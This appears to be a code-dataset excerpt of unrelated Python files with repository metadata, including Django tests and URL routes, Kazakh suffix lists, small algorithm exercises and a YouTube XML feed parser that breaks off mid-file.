class SignUpTests(TestCase):
def setUp(self):
url = reverse('signup')
self.response = self.client.get(url)
def test_signup_status_code(self):
self.assertEqual(self.response.status_code, 200)
def test_signup_url_resolves_signup_view(self):
view = resolve('/accounts/signup/')
self.assertEqual(view.func, signup)
def test_csrf(self):
self.assertContains(self.response, 'csrfmiddlewaretoken')
def test_contains_form(self):
form = self.response.context.get('form')
self.assertIsInstance(form, SignUpForm)
def test_form_inputs(self):
'''
The view must contain five inputs: csrf, username, email,
password1, password2
'''
self.assertContains(self.response, '<input', 5)
self.assertContains(self.response, 'type="text"', 1)
self.assertContains(self.response, 'type="email"', 1)
self.assertContains(self.response, 'type="password"', 2)
class SuccessfulSignUpTests(TestCase):
def setUp(self):
url = reverse('signup')
data = {
'username': 'john',
'email': 'john@doe.com',
'password1': 'abcdef123456',
'password2': 'abcdef123456'
}
self.response = self.client.post(url, data)
self.home_url = reverse('home')
def test_redirection(self):
'''
A valid form submission should redirect the user to the home page
'''
self.assertRedirects(self.response, self.home_url)
def test_user_creation(self):
self.assertTrue(User.objects.exists())
def test_user_authentication(self):
'''
Create a new request to an arbitrary page.
The resulting response should now have a `user` to its context,
after a successful sign up.
'''
response = self.client.get(self.home_url)
user = response.context.get('user')
self.assertTrue(user.is_authenticated)
class InvalidSignUpTests(TestCase):
def setUp(self):
url = reverse('signup')
self.response = self.client.post(url, {})
def test_signup_status_code(self):
'''
An invalid form submission should return to the same page
'''
self.assertEqual(self.response.status_code, 200)
def test_form_errors(self):
form = self.response.context.get('form')
self.assertTrue(form.errors)
def test_dont_create_user(self):
self.assertFalse(User.objects.exists())
|
[
"308960474@qq.com"
] |
308960474@qq.com
|
0dd2cef3dc56c4a4f8d361b8c08ba8662f40f907
|
1fd5f886a0cf83d30e95792036ffbafc2d3d12fe
|
/utils/affichage.py
|
a6992e28990667e0b213ae69265871a69cc8ca05
|
[] |
no_license
|
constance-scherer/PLDAC_Recommandation_analyse_sous_titres
|
9a2358bdf4b564bceccedd9588f7f4d2cb8e8e67
|
92106d497ffceb65df35d3884dec1072913ce8d1
|
refs/heads/master
| 2020-04-20T06:59:08.606057
| 2019-05-29T10:50:21
| 2019-05-29T10:50:21
| 168,699,380
| 4
| 0
| null | 2019-02-10T16:42:26
| 2019-02-01T13:11:40
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 524
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pandas as pd
def get_hist(df, x_axis, y_axis, titre, colour, font_size=None, horizontal=False):
if horizontal:
hist = df.plot.barh(x=x_axis, y=y_axis, color=colour, title =titre, fontsize = font_size, edgecolor = "none").get_figure()
else:
hist = df.plot.bar(x=x_axis, y=y_axis, color=colour, title =titre, fontsize = font_size, edgecolor = "none").get_figure()
path_fig = "img/"+titre+'.png'
hist.savefig(path_fig, bbox_inches="tight")
|
[
"amina.djelloul@hotmail.fr"
] |
amina.djelloul@hotmail.fr
|
8dfab12c043371b1ac8d6e3cf94c374f2d82fae4
|
bff707c5c0046350cc5a8f3d76b37c8403059380
|
/mysite/blog/migrations/0015_auto_20180831_2354.py
|
afb7c4fe8e7fdba1178521619a9d5e686c9ae0e2
|
[] |
no_license
|
0xArt/PersonalSite
|
4c54259e72e3ef5971ad85490ea536e45b7603da
|
02b092477fa69b78aa813398c6d18a79b94a7f97
|
refs/heads/master
| 2020-04-05T16:24:21.044320
| 2019-04-04T00:51:54
| 2019-04-04T00:51:54
| 157,010,755
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 383
|
py
|
# Generated by Django 2.0.6 on 2018-09-01 06:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0014_auto_20180831_2352'),
]
operations = [
migrations.AlterField(
model_name='post',
name='summary',
field=models.CharField(max_length=400),
),
]
|
[
"artinisagholian@gmail.com"
] |
artinisagholian@gmail.com
|
117fc293b953a162050b93cb0bc575cb49d741c8
|
30846dedeb87be7ba9894427122f6263fc99e67f
|
/courseSelection/urls.py
|
32ccc9fee82c3d18a272e7fc0c3b235ddc065d70
|
[] |
no_license
|
nslam/jwsys
|
003f2f6e5e4942182f6c2f9c35237a6127bc8015
|
c6958e128109cdffd830d69fc3a9d0bae0fac3d3
|
refs/heads/master
| 2021-01-23T05:56:05.059336
| 2019-03-09T15:25:54
| 2019-03-09T15:25:54
| 93,001,593
| 4
| 8
| null | 2017-07-05T02:10:46
| 2017-06-01T00:50:34
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,825
|
py
|
from django.conf.urls import url
from django.views.generic import RedirectView
from .views import student_views, instructor_views, manager_views, index_views
urlpatterns = [
url(r'^$', index_views.index),
# manager
url(r'^manager$', RedirectView.as_view(url='manager/index')),
url(r'^manager/index$', manager_views.show_manager),
url(r'^manager/curriculum$',manager_views.set_curriculum_demand),
url(r'^manager/curriculum/result$',manager_views.curriculum_demand_result),
url(r'^manager/manualselection$', manager_views.manual_selection),
url(r'^manager/selectiontime$', manager_views.set_time),
url(r'^manager/selectiontime/timeresult$', manager_views.time_result),
url(r'^manager/selectiontime/confirmresult$', manager_views.confirm_result),
url(r'^manager/setting$', manager_views.other_setting),
url(r'^manager/setting/result$', manager_views.other_setting_result),
url(r'^manager/manualselection$', manager_views.manual_selection),
url(r'^manager/manualselection/result$', manager_views.selection_result),
# instructor
url(r'^instructor$', RedirectView.as_view(url='instructor/index')),
url(r'^instructor/index$', instructor_views.index),
url(r'^instructor/studentlist$', instructor_views.studentlist),
# student
url(r'^student$', RedirectView.as_view(url='student/index')),
url(r'^student/index$', student_views.index),
url(r'^student/curriculum$', student_views.curriculum),
url(r'^student/selection$', student_views.selection),
url(r'^student/selection/drop$', student_views.dropcourse),
url(r'^student/selection/coursedetails$', student_views.coursedetails),
url(r'^student/selection/priority$', student_views.selectionpriority),
url(r'^student/selection/result$', student_views.selectionresult),
url(r'^student/schedule$', student_views.schedule),
]
|
[
"hanfei.ren@foxmail.com"
] |
hanfei.ren@foxmail.com
|
92ed6a36ac6f7be76144f403a841125f2a79c943
|
633c18a9e1931f937f7f91f05ce9749a4ac169f6
|
/work_with_pythest/tests/test_math.py
|
05d5b8bf6daeef827b40a6d56148b1075e179af4
|
[] |
no_license
|
borko81/python_scripts
|
fb3ff79377f19233e18d20f4f150735cdbe52c29
|
4e8ed38550f3b90bc00c07605d7e92822b079206
|
refs/heads/master
| 2022-07-07T19:26:52.467714
| 2022-06-24T15:46:57
| 2022-06-24T15:46:57
| 224,904,971
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
py
|
import pytest
def test_one_plus_one():
assert 1 + 1 == 2
def test_one_plust_two():
a = 1
b = 2
c = 3
assert a + b == c
def test_division_by_zero():
with pytest.raises(ZeroDivisionError) as e:
num = 1 / 0
assert 'division' in str(e.value)
|
[
"bstoilov81@gmail.com"
] |
bstoilov81@gmail.com
|
236f08e901aa2811beb0f5bc228a88b8b65cf996
|
caf1d3bd64bbece382fcad9c38da28f8bfd7b6ea
|
/rules.py
|
7788b1ed5ac7c146bbc9bc09e96d0aaab5aa965a
|
[] |
no_license
|
PavelPylypenko/kz_tagging
|
bf5dc192f7a3d552d9edda97ec141050204e33df
|
a057d3e8c26ba914bf59bc7063519e4be4090f28
|
refs/heads/master
| 2022-11-25T16:23:01.810210
| 2020-08-06T09:33:06
| 2020-08-06T09:33:06
| 285,529,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,701
|
py
|
NNATENDS = ['шык', 'шы', 'пыр', 'мпыр', 'алар', 'ашыщ', 'лар', 'елер', 'ды', 'рдан', 'рлан', 'рсақ', 'қтар', 'ылар', 'ылык', 'нші', 'лік', 'сшы', 'пша', 'хана', 'ашы', 'ші', 'паз', 'лық', 'йлар', 'қсы', 'ылық', 'ндық', 'ім', 'ар', 'ас', 'кер', 'уші', 'шілер', 'рік', 'ктер', 'қша', 'пан', 'лшы', 'дыр', 'тыр', 'рған', 'қай', 'алар', 'ылар', 'ңғы', 'ылар', 'ырақ', 'тік', 'ңдар', 'лын', 'ншақ', 'най', 'қтар', 'гер', 'рлер', 'ылар', 'ңіз', 'зші', 'шлер', 'гер', 'рлер', 'пкер', 'рлер', 'лігі', 'тур', 'турлер', 'ші', 'ілер', 'ншық', 'ын', 'шілік', 'ылық', 'дар', 'лық', 'ылар', 'шы', 'тар', 'гер', 'герлер', 'лер', 'ханалар', 'ілеп', 'паз', 'ік', 'іктер', 'керткіш', 'ту', 'ірткі', 'еп', 'ептер', 'сіз', 'уас', 'керу', 'ім', 'імде', 'башы', 'елер', 'пенділер', 'бек', 'кқор', 'шіл', 'ктер', 'ағасы', 'сы', 'лар', 'улар', 'тау']
NNILENDS = ['мның', 'енің', 'рдың', 'дың']
NNBAENDS = ['да', 'те', 'та', 'нда', 'нде', 'ға', 'ге', 'қа', 'ке', 'на', 'не', 'а', 'е', 'тік', 'еге ырға', 'рға', 'йға', 'ыға', 'аға', 'шаға', 'сіз', 'мға', 'ға']
NNTAENDS = ['мды', 'ені', 'рды', 'ырды', 'тты', 'ңды', 'керту', 'қы']
NNDJAENDS = ['да', 'зға', 'рда', 'еде']
NNSHIENDS = ['дан', 'ден', 'тан', 'тен', 'нан', 'нен', 'здан', 'зда', 'еден', 'рдан']
NNKOENDS = ['бен', 'здар', 'ммен', 'емен', 'рдан', 'мен', 'лармен', 'пен', 'нен', 'рмен', 'тпен', 'ңге', 'менен', 'ммен', 'мен', 'тармен', 'ілермен', 'герлермен', 'басшылық', 'іпқону', 'пенен']
SUB_ONE_SUF = ('тар', 'тер', 'дар', 'дер', 'лар', 'лер')
SUB_PLURAL_SUFFS = ('ның', 'нің', 'дың', 'дін', 'тың', 'тің',
'ға', 'ге', 'қа', 'ке', 'а', 'е', 'на', 'не',
'ны', 'н', 'ні', 'ды', 'ді', 'ты', 'ті',
'да', 'де', 'нда', 'нде', 'та', 'те',
'дан', ' ден', ' тан', ' тен', ' нан', ' нен',
'мен', ' менен', ' бен', ' бенен', ' пен', ' пенен')
SUB_SUFFIXES = ('ғай', 'гей', 'гер', 'ғи', 'ғой', 'дас', 'дес', 'дік', 'дық', 'кер', 'кес', 'қай', 'қар', 'қи', 'қой', 'қор', 'лас', 'лес', 'ліқ', 'лық', 'ман', 'паз', 'пана', 'сақ', 'тас', 'тес', 'тік', 'тық', 'хана', 'ша', 'шақ', 'ше', 'шек', 'ші', 'шік', 'шы', 'шық', 'ақ', 'ба', 'бе', 'ғақ', 'ғаш', 'гек', 'гі', 'ғіш', 'ғы', 'ғыш', 'дақ', 'дек', 'ек', 'ік', 'ім', 'іс', 'іш', 'к', 'кі', 'кіш', 'қ', 'қаш', 'қы', 'қыш', 'лақ', 'лек', 'м', 'ма', 'мақ', 'ме', 'мек', 'па', 'пақ', 'пе', 'пек', 'с', 'тақ', 'тек', 'уік', 'уық', 'ш', 'ық', 'ым', 'ыс', 'ыш', 'герлік', 'гіштік', 'ғыштық', 'дастық', 'дестік', 'ділік', 'дылық', 'кеәтік', 'қорлық', 'ластық', 'лестік', 'лілік', 'лылық', 'паздық', 'сақтық', 'сіздік', 'сыздық', 'тастық', 'тестік', 'тілік', 'тылық', 'шақтық', 'шілдік', 'шілік', 'шылдық', 'шылық', 'жан', 'ке', 'қан', 'сымақ', 'тай', 'ш', 'ша', 'шақ', 'ше', 'шік', 'шық')
SUB_ONE_l1 = ['а', 'у', 'н']
SUB_ONE_l2 = ['ға', 'ге', 'қа', 'ке', 'на', 'не', 'ны', 'ні', 'ды', 'ді', 'ты', 'ті', 'да', 'де', 'та', 'те', ]
SUB_ONE_l3 = ['ның', 'нің', 'дың', 'дін', 'тың', 'тің', 'нда', 'нде', 'дан', 'ден', 'тан', 'тен', 'нан', 'нен', 'мен', 'бен', 'пен']
SUB_ONE_l5 = ['менен', 'бенен', 'пенен']
OBJ_SUFFIXES = ('ға', 'ге', 'қа', 'ке', 'а', 'е', 'на', 'не', 'ны', 'н', 'ні', 'ды', 'ді', 'ты', 'ті')
OBJ_ENDS = ('тар', 'тер', 'дар', 'дер', 'лар', 'лер')
PRED_A_STARTS = ('тұр', 'отыр', 'жатыр', 'жүр')
PRED_A_SUFFIXES = ('біз', 'бін', 'быз', 'бын', 'ды', 'міз', 'мін', 'мыз', 'мын', 'піз', 'пің', 'пыз', 'пын', 'сіз', 'сіздер', 'сіндер', 'сің', 'сыз', 'сыздар', 'сың', 'сыңдар', 'ті', 'ты')
PRED_A_ENDS = ('п', 'ып', 'іп')
PRED_B_SUFFIXES = ('ap', 'ер', 'ыр', 'ір', 'а', 'е', 'й', 'и')
PRED_B_SUFFIX_ENDS = ('біз', 'бін', 'быз', 'бын', 'ды', 'міз', 'мін', 'мыз', 'мын', 'піз', 'пің', 'пыз', 'пын', 'сіз', 'сіздер', 'сіндер', 'сің', 'сыз', 'сыздар', 'сың', 'сыңдар', 'ті', 'ты')
PRED_C_SUFFIXES = ('ap', 'ep', 'ыр', 'ір')
PRED_C_POSS_SUFFIXES = ('', 'біз', 'бін', 'быз', 'бын', 'ды', 'міз', 'мін', 'мыз', 'мын', 'піз', 'пің', 'пыз', 'пын', 'сіз', 'сіздер', 'сіндер', 'сің', 'сыз', 'сыздар', 'сың', 'сыңдар', 'ті', 'ты')
PRED_C_ADD = ('еді', 'е')
PRED_D_ADD = ('еді', 'екен')
PRED_D_POSS_SUFFIXES = ('біз', 'бін', 'быз', 'бын', 'ды', 'міз', 'мін', 'мыз', 'мын', 'піз', 'пің', 'пыз', 'пын', 'сіз', 'сіздер', 'сіндер', 'сің', 'сыз', 'сыздар', 'сың', 'сыңдар', 'ті', 'ты')
PRED_D_SUFFIXES = ('ді', 'дік', 'діқ', 'дім', 'дің', 'ды', 'дык', 'дық', 'дым', 'дың', 'қ', 'ті', 'тік', 'тім', 'тің', 'ты', 'тык', 'тық', 'тым', 'тың', 'а', 'ай', 'ал', 'ан', 'ар', 'арыс', 'ға', 'ғал', 'ғар', 'ғе', 'ге', 'гер', 'гі', 'гіз', 'гіздір', 'гіле', 'гір', 'гіт', 'ғы', 'ғыз', 'ғыздыр', 'ғызыл', 'ғыла', 'ғыр', 'ғыт', 'да', 'дан', 'дар', 'дас', 'дастыр', 'де', 'ден', 'дендір', 'дес', 'діг', 'дік', 'дір', 'діргіз', 'дық', 'дыр', 'дырғыз', 'дырыл', 'е', 'ей', 'ел', 'ен', 'ер', 'й', 'іг', 'іғ', 'ік', 'ікіс', 'іл', 'іла', 'ілде', 'ілу', 'імсіре', 'ін', 'індір', 'ініс', 'іну', 'іңкіре', 'ір', 'ірде', 'іре', 'ірей', 'іріс', 'ірке', 'іркен', 'ірқе', 'іс', 'ісу', 'іт', 'ке', 'кер', 'кіз', 'кіле', 'кір', 'қа', 'қал', 'қан', 'қар', 'қе', 'қур', 'қыз', 'қыла', 'қыла', 'қыр', 'л', 'ла', 'лан', 'ландыр', 'лас', 'ластыр', 'лат', 'ле', 'лен', 'лендір', 'лес', 'лестір', 'лет', 'ліг', 'лік', 'лікіс', 'лін', 'ліс', 'лқа', 'лу', 'лығ', 'лық', 'лын', 'лыс', 'мала', 'меле', 'мсіре', 'мсыра', 'н', 'ні', 'ніл', 'ніс', 'ныл', 'ныс', 'ңгіре', 'ңғыра', 'ңкіре', 'ңқыра', 'ңра', 'ңре', 'р', 'ра', 'ре', 'с', 'са', 'сан', 'се', 'сен', 'сет', 'сетіл', 'сі', 'сін', 'сіре', 'стір', 'стыр', 'сы', 'сын', 'сыра', 'т', 'та', 'тан', 'тандыр', 'тас', 'те', 'тен', 'тендір', 'тес', 'тік', 'ттыр', 'тығ', 'тығс', 'тығыс', 'тық', 'тыр', 'тырыл', 'ура', 'ші', 'шы', 'ығ', 'ығыс', 'ық', 'ықыс', 'ыл', 'ыла', 'ылда', 'ылу', 'ылыс', 'ымсыра', 'ын', 'ындыр', 'ыну', 'ыныс', 'ыр', 'ыра', 'ырай', 'ырқа', 'ырқан', 'ырла', 'ыс', 'ысу', 'ыт', 'азы', 'ақта', 'ал', 'ала', 'аңғыра', 'аура', 'бала', 'бе', 'беле', 'би', 'бі', 'бы', 'дала', 'ди', 'ді', 'ды', 'екте', 'ел', 'еңгіре', 'еуре', 'жи', 'жіре', 'жыра', 'зы', 'і', 'ін', 'ірей', 'іс', 'іт', 'қи', 'лі', 'лы', 'ма', 'мала', 'меле', 'ми', 'мсіре', 'мсыра', 'ңра', 'ңре', 'палапеле', 'пи', 'пі', 'пы', 'ра', 'ре', 'си', 'сіре', 'сый', 'сыра', 'т', 'ти', 'ті', 'ты', 'усіре', 'усыра', 'ши', 'ші', 'шы', 'ы', 'ын', 'ыра', 'ырай', 'ыс', 'ыт')
PRED_SUFFIXES = ('ді', 'дік', 'діқ', 'дім', 'дің', 'ды', 'дык', 'дық', 'дым', 'дың', 'қ', 'ті', 'тік', 'тім', 'тің', 'ты', 'тык', 'тық', 'тым', 'тың', 'а', 'ай', 'ал', 'ан', 'ар', 'арыс', 'ға', 'ғал', 'ғар', 'ғе', 'ге', 'гер', 'гі', 'гіз', 'гіздір', 'гіле', 'гір', 'гіт', 'ғы', 'ғыз', 'ғыздыр', 'ғызыл', 'ғыла', 'ғыр', 'ғыт', 'да', 'дан', 'дар', 'дас', 'дастыр', 'де', 'ден', 'дендір', 'дес', 'діг', 'дік', 'дір', 'діргіз', 'дық', 'дыр', 'дырғыз', 'дырыл', 'е', 'ей', 'ел', 'ен', 'ер', 'й', 'іг', 'іғ', 'ік', 'ікіс', 'іл', 'іла', 'ілде', 'ілу', 'імсіре', 'ін', 'індір', 'ініс', 'іну', 'іңкіре', 'ір', 'ірде', 'іре', 'ірей', 'іріс', 'ірке', 'іркен', 'ірқе', 'іс', 'ісу', 'іт', 'ке', 'кер', 'кіз', 'кіле', 'кір', 'қа', 'қал', 'қан', 'қар', 'қе', 'қур', 'қыз', 'қыла', 'қыла', 'қыр', 'л', 'ла', 'лан', 'ландыр', 'лас', 'ластыр', 'лат', 'ле', 'лен', 'лендір', 'лес', 'лестір', 'лет', 'ліг', 'лік', 'лікіс', 'лін', 'ліс', 'лқа', 'лу', 'лығ', 'лық', 'лын', 'лыс', 'мала', 'меле', 'мсіре', 'мсыра', 'н', 'ні', 'ніл', 'ніс', 'ныл', 'ныс', 'ңгіре', 'ңғыра', 'ңкіре', 'ңқыра', 'ңра', 'ңре', 'р', 'ра', 'ре', 'с', 'са', 'сан', 'се', 'сен', 'сет', 'сетіл', 'сі', 'сін', 'сіре', 'стір', 'стыр', 'сы', 'сын', 'сыра', 'т', 'та', 'тан', 'тандыр', 'тас', 'те', 'тен', 'тендір', 'тес', 'тік', 'ттыр', 'тығ', 'тығс', 'тығыс', 'тық', 'тыр', 'тырыл', 'ура', 'ші', 'шы', 'ығ', 'ығыс', 'ық', 'ықыс', 'ыл', 'ыла', 'ылда', 'ылу', 'ылыс', 'ымсыра', 'ын', 'ындыр', 'ыну', 'ыныс', 'ыр', 'ыра', 'ырай', 'ырқа', 'ырқан', 'ырла', 'ыс', 'ысу', 'ыт', 'азы', 'ақта', 'ал', 'ала', 'аңғыра', 'аура', 'бала', 'бе', 'беле', 'би', 'бі', 'бы', 'дала', 'ди', 'ді', 'ды', 'екте', 'ел', 'еңгіре', 'еуре', 'жи', 'жіре', 'жыра', 'зы', 'і', 'ін', 'ірей', 'іс', 'іт', 'қи', 'лі', 'лы', 'ма', 'мала', 'меле', 'ми', 'мсіре', 'мсыра', 'ңра', 'ңре', 'палапеле', 'пи', 'пі', 'пы', 'ра', 'ре', 'си', 'сіре', 'сый', 'сыра', 'т', 'ти', 'ті', 'ты', 'усіре', 'усыра', 'ши', 'ші', 'шы', 'ы', 'ын', 'ыра', 'ырай', 'ыс', 'ыт', 'ған', 'ген', 'қан', 'кен', 'қон', 'ға', 'ге', 'қа', 'ке', 'атын', 'етін', 'йтын', 'йтін')
|
[
"pavlo.pylypenko@anvileight.com"
] |
pavlo.pylypenko@anvileight.com
|
c9830ab4f029b375f6bd3a3f24a0a151fc6d831a
|
0454d50b12960ef3a4a1f101f6d3bee585c7cfe9
|
/tests/parser/test_lieshu.py
|
99032d9cec5ead06d147eba826352df9a8959c42
|
[] |
no_license
|
Syhen/hmqf_crawler_hy
|
7a99c05d1ac87bc293872aeb5efec450db3fb689
|
80508040340d1c5a9fd5192e2f5f623fd77cac08
|
refs/heads/master
| 2021-09-19T23:31:38.730466
| 2018-08-01T09:51:40
| 2018-08-01T09:51:40
| 111,872,551
| 1
| 3
| null | 2018-01-05T10:07:00
| 2017-11-24T03:36:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,586
|
py
|
# -*- coding: utf-8 -*-
"""
create on 2017-11-27 上午11:15
author @heyao
"""
import json
from nose.tools import assert_list_equal, assert_is_instance, assert_dict_equal, assert_equal
from content_market.parser.lieshu import Lieshu
class TestLieshu(object):
def setUp(self):
self.lieshu = Lieshu()
def tear_down(self):
pass
def test_chapter_list(self):
with open('parser/data/lieshu/book_detail.html', 'r') as f:
content = f.read().decode('utf-8')
with open('parser/data/lieshu/chapters.json', 'r') as f:
real_chapters = json.load(f)
url = 'http://www.lieshu.cc'
chapters = self.lieshu.parse_chapter_list(content, url)
assert_is_instance(chapters, type((i for i in (1,))))
assert_list_equal(list(chapters), real_chapters)
def test_chapter_content(self):
with open('parser/data/lieshu/chapter_content.html', 'r') as f:
content_page = f.read().decode('utf-8')
with open('parser/data/lieshu/chapter_content.txt', 'r') as f:
content = f.read().decode('utf-8')
assert_equal(content, self.lieshu.parse_content(content_page))
def test_book_detail(self):
with open('parser/data/lieshu/book_detail.html', 'r') as f:
content = f.read().decode('utf-8')
with open('parser/data/lieshu/book_detail.json', 'r') as f:
book_detail = json.load(f)
url = 'http://www.lieshu.cc/2/2732/'
info = self.lieshu.parse_detail(content, url)
assert_dict_equal(book_detail, dict(info))
|
[
"lushangkun1228@hotmail.com"
] |
lushangkun1228@hotmail.com
|
db93795161562c704ef128162efea62145d2f060
|
0b80b985d83f9999658f0039472af20eec97f60d
|
/dl_code.py
|
b7742e3308dd4d4b5a68b20cf86e523350536631
|
[] |
no_license
|
sahilm142/imdb-reviews-analysis
|
83955edc362fea056b5b01270f0936118d9d6da5
|
0f19fd0d02c3b734936b14f569d85f5a47e16c53
|
refs/heads/master
| 2020-05-15T12:18:33.109597
| 2019-04-19T20:38:03
| 2019-04-19T20:38:03
| 182,245,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,094
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 7 11:30:32 2019
@author: Sahil
"""
import numpy as np
import pandas as pd
import csv
def create_dataset(folder_name,type_rev):
'''
Column names
0: Type of review from top 250s 1: TV 2: Movies
1: Serial no of type 0 in top 250
2: Rating of review
3: Review
4: Sentiment Score (1-4: Negative->0 and 7-10: Positive-> 1)
'''
for j in range(1,251):
for i in [1,2,3,4,7,8,9,10]:
try:
datas = open(folder_name+"/"+str(j)+"/"+str(i)+".txt","r")
df = pd.read_csv(datas,sep='\n',header=None)
#datas = open("Data/"+str(j)+"/summary/"+str(i)+".txt","r")
#df_summ = pd.read_csv(datas,sep='\n',header=None)
except:
print("Token {0}:{1}".format(j,i))
continue
with open(folder_name+'.csv', 'a') as csvfile:
k=0
while k<len(df):
try:
csv_writer = csv.writer(csvfile, delimiter=',')
if i<5:
csv_writer.writerow([type_rev,j,i,df[0][k],0])
else:
csv_writer.writerow([type_rev,j,i,df[0][k],1])
k+=1
except:
print("{0} {1} {2} ".format(j,i,len(df)))
break
# Review type 1: TV 2: MOVIES
create_dataset("tv_250",1)
create_dataset("movies_250",2)
data_tv = pd.read_csv("tv_250.csv",header=None,encoding="latin-1")
data_movies = pd.read_csv("movies_250.csv",header=None,encoding="latin-1")
data = pd.concat([data_tv, data_movies])
# Reviews
reviews = data.iloc[:,3].values
for i in range(len(reviews)):
with open("final_data/reviews.txt","a",encoding="latin-1") as f:
f.writelines(reviews[i]+"\n")
# Labels
labels = data.iloc[:,4].values
for i in range(len(labels)):
with open("final_data/labels.txt","a") as f:
f.writelines(labels[i]+"\n")
|
[
"sahil.mansoori.143@gmail.com"
] |
sahil.mansoori.143@gmail.com
|
7373cab884ab98deb78bcd0b60f131314c4adecb
|
42a5c898a3a750c54dc746429e306b9f40a8638e
|
/pizza/orders/admin.py
|
bd3ee529187b49a87581f033cfc17e3d0e95696a
|
[] |
no_license
|
selbieh/Pizza
|
16f4198714b88ad93f354e6c0eb98d92a19e364b
|
c10bd78b1318d7e81128e66fa67d09241618e00d
|
refs/heads/master
| 2022-05-18T04:25:46.431748
| 2020-01-13T13:45:59
| 2020-01-13T13:45:59
| 233,557,658
| 0
| 0
| null | 2022-04-22T22:59:33
| 2020-01-13T09:24:18
|
Python
|
UTF-8
|
Python
| false
| false
| 120
|
py
|
from django.contrib import admin
from .models import orderPizzaItem,order
admin.site.register([orderPizzaItem,order])
|
[
"selbieh@gmail.com"
] |
selbieh@gmail.com
|
f7c3fccd2351d12f60914ebd2d253e3434834656
|
48a29c558eba558cff4c40171d14ae92a29bccaa
|
/matrix/zero_matrix.py
|
d8982f5c0e6ab831d934c5118283c2e7cef71fb4
|
[] |
no_license
|
gammaseeker/DSA_Python
|
ea0a3cb526d7f71136c9a6134be0947c9be65ab0
|
70633cb7b53dbe628e7edd0fb2b6973872f90e50
|
refs/heads/master
| 2023-07-07T02:25:50.548688
| 2021-08-10T20:00:56
| 2021-08-10T20:00:56
| 196,867,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,237
|
py
|
def zero_matrix(matrix):
# Check if top row has 0
row_zero = False
for col in range(0, len(matrix[0])):
if matrix[0][col] == 0:
row_zero = True
# Check if first col has 0
col_zero = False
for row in range(0, len(matrix)):
if matrix[row][0] == 0:
col_zero = True
# Look for zeros and mark them in first row,col
if len(matrix) > 1 and len(matrix[0]) > 1:
for row in range(1, len(matrix)):
for col in range(1, len(matrix[0])):
if matrix[row][col] == 0:
matrix[0][col] = 0
matrix[row][0] = 0
# Insert the zeros
if len(matrix) > 1 and len(matrix[0]) > 1:
for row in range(1, len(matrix)):
for col in range(1, len(matrix[0])):
if matrix[0][col] == 0 or matrix[row][0] == 0:
matrix[row][col] = 0
if row_zero:
for col in range(0, len(matrix[0])):
matrix[0][col] = 0
if col_zero:
for row in range(0, len(matrix)):
matrix[row][0] = 0
test1 = [[1, 1, 1], [1, 0, 1], [1, 1, 1]]
test2 = [[0,1,2,0],[3,4,5,2],[1,3,1,5]]
zero_matrix(test1)
print(test1)
zero_matrix(test2)
print(test2)
|
[
"jjiemjitpolchai9540@bths.edu"
] |
jjiemjitpolchai9540@bths.edu
|
af01032059305357b2406966e9ed3d432d2a7f77
|
0be6bb93eda9c8fb1798bd99f15ef4acb04fc504
|
/src/pe0026.py
|
61df838294b1fd130e79832d9c2ff856ba97bc98
|
[] |
no_license
|
neysene/project-euler
|
d7f9ec8c3a46fd7fd61eec4044632e6166146337
|
79f9170482000328dcddb4a34701b75ab8209638
|
refs/heads/master
| 2021-01-10T07:03:55.054443
| 2016-01-29T05:30:40
| 2016-01-29T05:30:40
| 49,287,376
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 461
|
py
|
if __name__ == '__main__':
maxx, keep = 1, 3
for i in xrange(2, 1000):
num, denom, flag = 10, i, True
a = []
while flag:
k = num%denom
if k == 0:
break
elif k in a:
if len(a) > maxx:
maxx = len(a)
keep = i
break
else:
a.append(k)
num = (k) * 10
print keep
|
[
"ismailgonul@gmail.com"
] |
ismailgonul@gmail.com
|
1c90d3231346ed0d9f466ab115158842a74a22cb
|
af73bf48ac21f0cdbfe1dffc9fba09172dbcfd4a
|
/youtube_parser.py
|
2a9ae0a5a08ce1e77239d36f9b8adb55521b33c4
|
[
"MIT"
] |
permissive
|
cborao/youtube-xml-parser
|
2d92e57d3d23339f9da74d90cfd7505dc75eacf3
|
0ed6377cf39ba59ec762589cb1f6399cb5786081
|
refs/heads/master
| 2023-06-05T10:10:45.294835
| 2021-06-22T16:55:12
| 2021-06-22T16:55:12
| 379,341,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,324
|
py
|
#!/usr/bin/python3
#
# Simple XML parser for YouTube XML channels
# César Borao Moratinos
#
# Based on "ytparser.py" code:
#
# Jesus M. Gonzalez-Barahona
# jgb @ gsyc.es
# SARO and SAT subjects (Universidad Rey Juan Carlos)
# 2020
#
# The input is a valid channel ID. The parser produces a HTML document in standard output, with
# the list of videos on the channel
#
from urllib.error import URLError
from xml.sax.handler import ContentHandler
from xml.sax import make_parser
import sys
import urllib.request
videos = ""
class YTHandler(ContentHandler):
def __init__(self):
self.inEntry = False
self.inContent = False
self.content = ""
self.title = ""
self.link = ""
def startElement(self, name, attrs):
if name == 'entry':
self.inEntry = True
elif self.inEntry:
if name == 'title':
self.inContent = True
elif name == 'link':
self.link = attrs.get('href')
def endElement(self, name):
global videos
if name == 'entry':
self.inEntry = False
videos = videos \
+ " <li><a href='" + self.link + "'>" \
+ self.title + "</a></li>\n"
elif self.inEntry:
if name == 'title':
self.title = self.content
self.content = ""
self.inContent = False
def characters(self, chars):
if self.inContent:
self.content = self.content + chars
# Loading parser and driver
Parser = make_parser()
Parser.setContentHandler(YTHandler())
# --- Main prog
if __name__ == "__main__":
PAGE = """
<!DOCTYPE html>
<html lang="en">
<body>
<h1>Youtube channel contents:</h1>
<ul>
{videos}
</ul>
</body>
</html>
"""
if len(sys.argv) < 2:
print("Usage: python youtube_parser.py <channel id>")
print(" <channel id>: The unique ID of a youtube channel")
sys.exit(1)
# Reading the channel's xml file
try:
